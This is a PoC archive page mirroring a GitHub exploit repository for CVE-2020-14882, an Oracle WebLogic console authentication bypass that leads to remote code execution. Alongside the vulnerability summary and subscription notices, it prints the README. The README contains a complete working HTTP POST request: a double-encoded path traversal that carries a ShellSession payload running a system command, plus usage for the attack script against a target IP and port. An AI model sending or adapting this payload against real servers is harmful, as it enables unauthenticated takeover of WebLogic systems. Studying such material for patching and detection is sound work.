Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-14882 PoC — Oracle WebLogic Server 安全漏洞

Source
https://github.com/ludy-dev/Weblogic_Unauthorized-bypass-RCE
Associated Vulnerability
Title:Oracle WebLogic Server 安全漏洞 (CVE-2020-14882)
Description:Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Description
(CVE-2020-14882) Oracle Weblogic Unauthorized bypass RCE test script
Readme
# (CVE-2020–14882) Weblogic Unauthorized bypass RCE
(CVE-2020-14882) Oracle Weblogic Unauthorized bypass RCE test script
it works on Python3 
# Requests

    POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
    Host: <Target IP>
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
    Accept-Encoding: gzip, deflate
    Accept: */*
    Connection: keep-alive
    Content-type: application/x-www-form-urlencoded; charset=utf-8
    Content-Length: 128

    _nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('ipconfig');");
    
Test script checks response data with pcre. 

# Usage 
    - 7001/tcp (WebLogic default port) 
    Oracle Weblogic Auth Bypass RCE(CVE-2020–14882).py <Target IP>
    
    - specific port/tcp 
    Oracle Weblogic Auth Bypass RCE(CVE-2020–14882).py <Target IP> <port>
# Affected Version 
WebLogic 10.3.6.0.0

WebLogic 12.1.3.0.0

WebLogic 12.2.1.3.0

WebLogic 12.2.1.4.0

WebLogic 14.1.1.0.0

# PoC 
https://github.com/jas502n/CVE-2020-14882

# reference 
https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
https://www.tenable.com/blog/cve-2020-14882-oracle-weblogic-remote-code-execution-vulnerability-exploited-in-the-wild
File Snapshot

 [4.0K]  /data/pocs/2b2290297b2f48d7998d72c7d36a2f65c9e33c7e
├── [1.2K]  Oracle Weblogic Auth Bypass RCE(CVE-2020–14882).py
└── [1.3K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →